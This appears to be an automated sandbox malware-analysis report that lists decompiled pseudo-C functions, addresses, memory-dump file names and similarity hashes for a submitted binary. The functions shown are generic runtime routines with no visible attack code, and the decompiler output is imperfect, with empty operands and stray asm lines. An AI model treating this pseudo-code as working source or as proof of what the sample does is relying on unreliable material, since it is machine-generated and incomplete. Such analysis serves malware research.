                                                                                                                                                                                                                                                        				if ((__edx & 0x00000007) != 0) goto 0xe5ac4fee;
                                                                                                                                                                                                                                                        				goto 0xe5ac5018;
                                                                                                                                                                                                                                                        				 *((char*)(__rdx + 1 + _t52)) = 0;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                        0x7ff6e5ac4f56
                                                                                                                                                                                                                                                        0x7ff6e5ac4f5f
                                                                                                                                                                                                                                                        0x7ff6e5ac4f61
                                                                                                                                                                                                                                                        0x7ff6e5ac4f65
                                                                                                                                                                                                                                                        0x7ff6e5ac4f67
                                                                                                                                                                                                                                                        0x7ff6e5ac4f6d
                                                                                                                                                                                                                                                        0x7ff6e5ac4f9b
                                                                                                                                                                                                                                                        0x7ff6e5ac4fa3
                                                                                                                                                                                                                                                        0x7ff6e5ac4faa
                                                                                                                                                                                                                                                        0x7ff6e5ac4fb5
                                                                                                                                                                                                                                                        0x7ff6e5ac4fbc
                                                                                                                                                                                                                                                        0x7ff6e5ac4fc7
                                                                                                                                                                                                                                                        0x7ff6e5ac4fce
                                                                                                                                                                                                                                                        0x7ff6e5ac4fd3
                                                                                                                                                                                                                                                        0x7ff6e5ac4fd8
                                                                                                                                                                                                                                                        0x7ff6e5ac4fdf
                                                                                                                                                                                                                                                        0x7ff6e5ac4fe4
                                                                                                                                                                                                                                                        0x7ff6e5ac4fe6
                                                                                                                                                                                                                                                        0x7ff6e5ac4fec
                                                                                                                                                                                                                                                        0x7ff6e5ac4fee
                                                                                                                                                                                                                                                        0x7ff6e5ac4ff0
                                                                                                                                                                                                                                                        0x7ff6e5ac4ff3
                                                                                                                                                                                                                                                        0x7ff6e5ac4ff5
                                                                                                                                                                                                                                                        0x7ff6e5ac4ffd
                                                                                                                                                                                                                                                        0x7ff6e5ac5002
                                                                                                                                                                                                                                                        0x7ff6e5ac5004
                                                                                                                                                                                                                                                        0x7ff6e5ac5008
                                                                                                                                                                                                                                                        0x7ff6e5ac500e

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                        • Instruction ID: e4c728b9a184661517dc8f736164cbb09c4185e496b0d08af32e275b6f673ec2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4641D753E0964A4CFB51891C45207B81680AF26FA1D6852B4ECAADF3C3CF0F2D86C18B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC8BA0(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                                                                        				signed long long _t66;
                                                                                                                                                                                                                                                        				signed long long _t74;
                                                                                                                                                                                                                                                        				signed long long _t76;
                                                                                                                                                                                                                                                        				signed long long _t77;
                                                                                                                                                                                                                                                        				signed int* _t90;
                                                                                                                                                                                                                                                        				signed long long _t95;
                                                                                                                                                                                                                                                        				signed long long _t96;
                                                                                                                                                                                                                                                        				signed long long _t98;
                                                                                                                                                                                                                                                        				signed long long _t104;
                                                                                                                                                                                                                                                        				long long _t115;
                                                                                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                                                                                        				signed long long* _t123;
                                                                                                                                                                                                                                                        				signed long long _t124;
                                                                                                                                                                                                                                                        				signed long long _t126;
                                                                                                                                                                                                                                                        				signed long long _t129;
                                                                                                                                                                                                                                                        				signed long long*** _t132;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t52 = __edi;
                                                                                                                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                                                                                                                                                                                        				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                                                                        				_t132 = __rcx;
                                                                                                                                                                                                                                                        				_t90 =  *_t66;
                                                                                                                                                                                                                                                        				if (_t90 == 0) goto 0xe5ac8d34;
                                                                                                                                                                                                                                                        				_t124 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t111 = _t124 ^  *_t90;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				_t74 = _t124 ^ _t90[4];
                                                                                                                                                                                                                                                        				asm("dec ecx");
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				if ((_t124 ^ _t90[2]) != _t74) goto 0xe5ac8ca6;
                                                                                                                                                                                                                                                        				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
                                                                                                                                                                                                                                                        				_t101 =  >  ? _t66 : _t76;
                                                                                                                                                                                                                                                        				_t6 = _t115 + 0x20; // 0x20
                                                                                                                                                                                                                                                        				_t102 = ( >  ? _t66 : _t76) + _t76;
                                                                                                                                                                                                                                                        				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
                                                                                                                                                                                                                                                        				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0xe5ac8c42;
                                                                                                                                                                                                                                                        				_t7 = _t115 + 8; // 0x8
                                                                                                                                                                                                                                                        				r8d = _t7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD24FC(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
                                                                                                                                                                                                                                                        				_t24 = E00007FF67FF6E5AC9E18(_t66, _t111);
                                                                                                                                                                                                                                                        				if (_t66 != 0) goto 0xe5ac8c6a;
                                                                                                                                                                                                                                                        				_t104 = _t76 + 4;
                                                                                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD24FC(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
                                                                                                                                                                                                                                                        				_t129 = _t66;
                                                                                                                                                                                                                                                        				_t26 = E00007FF67FF6E5AC9E18(_t66, _t111);
                                                                                                                                                                                                                                                        				if (_t129 == 0) goto 0xe5ac8d34;
                                                                                                                                                                                                                                                        				_t123 = _t129 + _t76 * 8;
                                                                                                                                                                                                                                                        				_t77 = _t129 + _t104 * 8;
                                                                                                                                                                                                                                                        				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                                                                                                                                                                        				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
                                                                                                                                                                                                                                                        				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0xe5ac8ca6;
                                                                                                                                                                                                                                                        				memset(_t52, _t26, 0 << 0);
                                                                                                                                                                                                                                                        				_t126 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				r8d = 0x40;
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                                                                                                                                                                                                        				_t95 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				 *( *( *_t132)) = _t129 ^ _t95;
                                                                                                                                                                                                                                                        				_t96 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                                                                                                                                                                                                        				_t98 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				r8d = r8d - (_t51 & 0x0000003f);
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				( *( *_t132))[2] = _t77 ^ _t98;
                                                                                                                                                                                                                                                        				goto 0xe5ac8d37;
                                                                                                                                                                                                                                                        				return 0xffffffff;
                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                        0x7ff6e5ac8ba0
                                                                                                                                                                                                                                                        0x7ff6e5ac8ba0
                                                                                                                                                                                                                                                        0x7ff6e5ac8ba0
                                                                                                                                                                                                                                                        0x7ff6e5ac8ba5
                                                                                                                                                                                                                                                        0x7ff6e5ac8baa
                                                                                                                                                                                                                                                        0x7ff6e5ac8bb8
                                                                                                                                                                                                                                                        0x7ff6e5ac8bbd
                                                                                                                                                                                                                                                        0x7ff6e5ac8bc0
                                                                                                                                                                                                                                                        0x7ff6e5ac8bc6
                                                                                                                                                                                                                                                        0x7ff6e5ac8bcc
                                                                                                                                                                                                                                                        0x7ff6e5ac8bd9
                                                                                                                                                                                                                                                        0x7ff6e5ac8be2
                                                                                                                                                                                                                                                        0x7ff6e5ac8bec
                                                                                                                                                                                                                                                        0x7ff6e5ac8bf0
                                                                                                                                                                                                                                                        0x7ff6e5ac8bf3
                                                                                                                                                                                                                                                        0x7ff6e5ac8bf9
                                                                                                                                                                                                                                                        0x7ff6e5ac8c07
                                                                                                                                                                                                                                                        0x7ff6e5ac8c11
                                                                                                                                                                                                                                                        0x7ff6e5ac8c15
                                                                                                                                                                                                                                                        0x7ff6e5ac8c18
                                                                                                                                                                                                                                                        0x7ff6e5ac8c1b
                                                                                                                                                                                                                                                        0x7ff6e5ac8c22
                                                                                                                                                                                                                                                        0x7ff6e5ac8c24
                                                                                                                                                                                                                                                        0x7ff6e5ac8c24
                                                                                                                                                                                                                                                        0x7ff6e5ac8c2e
                                                                                                                                                                                                                                                        0x7ff6e5ac8c38
                                                                                                                                                                                                                                                        0x7ff6e5ac8c40
                                                                                                                                                                                                                                                        0x7ff6e5ac8c42
                                                                                                                                                                                                                                                        0x7ff6e5ac8c46
                                                                                                                                                                                                                                                        0x7ff6e5ac8c52
                                                                                                                                                                                                                                                        0x7ff6e5ac8c59
                                                                                                                                                                                                                                                        0x7ff6e5ac8c5c
                                                                                                                                                                                                                                                        0x7ff6e5ac8c64
                                                                                                                                                                                                                                                        0x7ff6e5ac8c71
                                                                                                                                                                                                                                                        0x7ff6e5ac8c75
                                                                                                                                                                                                                                                        0x7ff6e5ac8c8d
                                                                                                                                                                                                                                                        0x7ff6e5ac8c91
                                                                                                                                                                                                                                                        0x7ff6e5ac8c94
                                                                                                                                                                                                                                                        0x7ff6e5ac8c9c
                                                                                                                                                                                                                                                        0x7ff6e5ac8c9f
                                                                                                                                                                                                                                                        0x7ff6e5ac8ca6
                                                                                                                                                                                                                                                        0x7ff6e5ac8cc5
                                                                                                                                                                                                                                                        0x7ff6e5ac8ccb
                                                                                                                                                                                                                                                        0x7ff6e5ac8cce
                                                                                                                                                                                                                                                        0x7ff6e5ac8ce1
                                                                                                                                                                                                                                                        0x7ff6e5ac8cea
                                                                                                                                                                                                                                                        0x7ff6e5ac8cf0
                                                                                                                                                                                                                                                        0x7ff6e5ac8d01
                                                                                                                                                                                                                                                        0x7ff6e5ac8d0a
                                                                                                                                                                                                                                                        0x7ff6e5ac8d0e
                                                                                                                                                                                                                                                        0x7ff6e5ac8d1a
                                                                                                                                                                                                                                                        0x7ff6e5ac8d23
                                                                                                                                                                                                                                                        0x7ff6e5ac8d2e
                                                                                                                                                                                                                                                        0x7ff6e5ac8d32
                                                                                                                                                                                                                                                        0x7ff6e5ac8d4f

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1334314998-0
                                                                                                                                                                                                                                                        • Opcode ID: bafe0f992901b38d31db648ac9192d5353b413cfa0e321c1723c5c35d34331dc
                                                                                                                                                                                                                                                        • Instruction ID: d2d06feea9f74d17e2a349cca4a6201e59798c2fac00d368616951973ce7d0c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bafe0f992901b38d31db648ac9192d5353b413cfa0e321c1723c5c35d34331dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA41F463B14A5582EF54CF2ED9246A963A1BB48FD0B49A036DE0DCBB54DF3DD8828304
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC6560(intOrPtr __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				long long _v24;
                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                        				long long _v40;
                                                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                                                        				intOrPtr* _t62;
                                                                                                                                                                                                                                                        				long long _t64;
                                                                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                                                                        				long long _t91;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t61 = _t84;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				r14d = 0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 - 0x10)) = _t91;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 - 0x18)) = _t91;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t61 - 0x20)) = r14d;
                                                                                                                                                                                                                                                        				r9d = r9d | 0xffffffff;
                                                                                                                                                                                                                                                        				 *((long long*)(_t61 - 0x28)) = _t91;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				if (_t29 != 0) goto 0xe5ac65b9;
                                                                                                                                                                                                                                                        				_t30 = E00007FF67FF6E5AC4444(_t61);
                                                                                                                                                                                                                                                        				 *_t61 = 0x2a;
                                                                                                                                                                                                                                                        				goto 0xe5ac65ec;
                                                                                                                                                                                                                                                        				if (__rdx == 0) goto 0xe5ac65ec;
                                                                                                                                                                                                                                                        				_v16 = _t91;
                                                                                                                                                                                                                                                        				r9d = r9d | 0xffffffff;
                                                                                                                                                                                                                                                        				_v24 = _t91;
                                                                                                                                                                                                                                                        				_v32 = r14d;
                                                                                                                                                                                                                                                        				_v40 = _t91;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				if (_t30 == 0) goto 0xe5ac65a9;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACDD40(_t30, _t91 + _t30, __rdx);
                                                                                                                                                                                                                                                        				_t64 = _t61;
                                                                                                                                                                                                                                                        				if (_t61 != 0) goto 0xe5ac660f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t61, _t91 + _t30);
                                                                                                                                                                                                                                                        				goto 0xe5ac6697;
                                                                                                                                                                                                                                                        				_v16 = _t91;
                                                                                                                                                                                                                                                        				r9d = r9d | 0xffffffff;
                                                                                                                                                                                                                                                        				_v24 = _t91;
                                                                                                                                                                                                                                                        				_v32 = __edi;
                                                                                                                                                                                                                                                        				_v40 = _t64;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				if (0 != 0) goto 0xe5ac6649;
                                                                                                                                                                                                                                                        				_t34 = E00007FF67FF6E5AC4444(_t61);
                                                                                                                                                                                                                                                        				 *_t61 = 0x2a;
                                                                                                                                                                                                                                                        				goto 0xe5ac6603;
                                                                                                                                                                                                                                                        				if (__rdx == 0) goto 0xe5ac667f;
                                                                                                                                                                                                                                                        				_t62 = _t64 + _t64;
                                                                                                                                                                                                                                                        				_v16 = _t91;
                                                                                                                                                                                                                                                        				_v24 = _t91;
                                                                                                                                                                                                                                                        				_v32 = __edi;
                                                                                                                                                                                                                                                        				r9d = r9d | 0xffffffff;
                                                                                                                                                                                                                                                        				_v40 = _t62;
                                                                                                                                                                                                                                                        				 *((char*)(_t62 - 1)) = 0x3d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACF0B8();
                                                                                                                                                                                                                                                        				if (_t34 == 0) goto 0xe5ac6639;
                                                                                                                                                                                                                                                        				0xe5ad029c(_t91);
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5AC9E18(_t62, _t64) & 0xffffff00 | _t34 == 0x00000000;
                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                        0x7ff6e5ac6560
                                                                                                                                                                                                                                                        0x7ff6e5ac6563
                                                                                                                                                                                                                                                        0x7ff6e5ac6567
                                                                                                                                                                                                                                                        0x7ff6e5ac656b
                                                                                                                                                                                                                                                        0x7ff6e5ac656f
                                                                                                                                                                                                                                                        0x7ff6e5ac6579
                                                                                                                                                                                                                                                        0x7ff6e5ac657f
                                                                                                                                                                                                                                                        0x7ff6e5ac6586
                                                                                                                                                                                                                                                        0x7ff6e5ac658d
                                                                                                                                                                                                                                                        0x7ff6e5ac6591
                                                                                                                                                                                                                                                        0x7ff6e5ac6597
                                                                                                                                                                                                                                                        0x7ff6e5ac659d
                                                                                                                                                                                                                                                        0x7ff6e5ac65a7
                                                                                                                                                                                                                                                        0x7ff6e5ac65a9
                                                                                                                                                                                                                                                        0x7ff6e5ac65b1
                                                                                                                                                                                                                                                        0x7ff6e5ac65b7
                                                                                                                                                                                                                                                        0x7ff6e5ac65bc
                                                                                                                                                                                                                                                        0x7ff6e5ac65be
                                                                                                                                                                                                                                                        0x7ff6e5ac65c3
                                                                                                                                                                                                                                                        0x7ff6e5ac65c7
                                                                                                                                                                                                                                                        0x7ff6e5ac65cf
                                                                                                                                                                                                                                                        0x7ff6e5ac65d8
                                                                                                                                                                                                                                                        0x7ff6e5ac65dd
                                                                                                                                                                                                                                                        0x7ff6e5ac65e7
                                                                                                                                                                                                                                                        0x7ff6e5ac65f4
                                                                                                                                                                                                                                                        0x7ff6e5ac65f9
                                                                                                                                                                                                                                                        0x7ff6e5ac65ff
                                                                                                                                                                                                                                                        0x7ff6e5ac6603
                                                                                                                                                                                                                                                        0x7ff6e5ac660a
                                                                                                                                                                                                                                                        0x7ff6e5ac660f
                                                                                                                                                                                                                                                        0x7ff6e5ac6614
                                                                                                                                                                                                                                                        0x7ff6e5ac6618
                                                                                                                                                                                                                                                        0x7ff6e5ac6620
                                                                                                                                                                                                                                                        0x7ff6e5ac6628
                                                                                                                                                                                                                                                        0x7ff6e5ac662d
                                                                                                                                                                                                                                                        0x7ff6e5ac6637
                                                                                                                                                                                                                                                        0x7ff6e5ac6639
                                                                                                                                                                                                                                                        0x7ff6e5ac6641
                                                                                                                                                                                                                                                        0x7ff6e5ac6647
                                                                                                                                                                                                                                                        0x7ff6e5ac664c
                                                                                                                                                                                                                                                        0x7ff6e5ac664e
                                                                                                                                                                                                                                                        0x7ff6e5ac6652
                                                                                                                                                                                                                                                        0x7ff6e5ac6659
                                                                                                                                                                                                                                                        0x7ff6e5ac665e
                                                                                                                                                                                                                                                        0x7ff6e5ac6662
                                                                                                                                                                                                                                                        0x7ff6e5ac6669
                                                                                                                                                                                                                                                        0x7ff6e5ac6670
                                                                                                                                                                                                                                                        0x7ff6e5ac6676
                                                                                                                                                                                                                                                        0x7ff6e5ac667d
                                                                                                                                                                                                                                                        0x7ff6e5ac6684
                                                                                                                                                                                                                                                        0x7ff6e5ac66b1

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e0e4f4257793a8cb42071661874f43e486d40e08231ff9a9917ab5bb87609a06
                                                                                                                                                                                                                                                        • Instruction ID: fdf6eb30f541e26059ab77011da33bdd4146fe14c1a1d54e367011e5003301f0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0e4f4257793a8cb42071661874f43e486d40e08231ff9a9917ab5bb87609a06
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8319333708B4242E724DF2964502796695AF84F90F144238EA5DDBB9ADF3DD8128609
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD89B0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t25 = __r8;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *0xe5afd3cc = r8d;
                                                                                                                                                                                                                                                        				_t1 = _t25 + 1; // 0x1
                                                                                                                                                                                                                                                        				r9d = _t1;
                                                                                                                                                                                                                                                        				asm("cpuid");
                                                                                                                                                                                                                                                        				_v16 = r9d;
                                                                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                                                                        				_v20 = __ebx;
                                                                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                                                                        				if (0 != 0x18001000) goto 0xe5ad8a11;
                                                                                                                                                                                                                                                        				asm("xgetbv");
                                                                                                                                                                                                                                                        				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                                                                                                                                                                        				r8d =  *0xe5afd3cc; // 0x1
                                                                                                                                                                                                                                                        				r8d =  ==  ? r9d : r8d;
                                                                                                                                                                                                                                                        				 *0xe5afd3cc = r8d;
                                                                                                                                                                                                                                                        				 *0xe5afd3d0 = r8d;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                                                        0x7ff6e5ad89b0
                                                                                                                                                                                                                                                        0x7ff6e5ad89b6
                                                                                                                                                                                                                                                        0x7ff6e5ad89bb
                                                                                                                                                                                                                                                        0x7ff6e5ad89c2
                                                                                                                                                                                                                                                        0x7ff6e5ad89c2
                                                                                                                                                                                                                                                        0x7ff6e5ad89c9
                                                                                                                                                                                                                                                        0x7ff6e5ad89cb
                                                                                                                                                                                                                                                        0x7ff6e5ad89d3
                                                                                                                                                                                                                                                        0x7ff6e5ad89d9
                                                                                                                                                                                                                                                        0x7ff6e5ad89dd
                                                                                                                                                                                                                                                        0x7ff6e5ad89e3
                                                                                                                                                                                                                                                        0x7ff6e5ad89e7
                                                                                                                                                                                                                                                        0x7ff6e5ad89f1
                                                                                                                                                                                                                                                        0x7ff6e5ad89fb
                                                                                                                                                                                                                                                        0x7ff6e5ad8a06
                                                                                                                                                                                                                                                        0x7ff6e5ad8a0a
                                                                                                                                                                                                                                                        0x7ff6e5ad8a11
                                                                                                                                                                                                                                                        0x7ff6e5ad8a1f

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
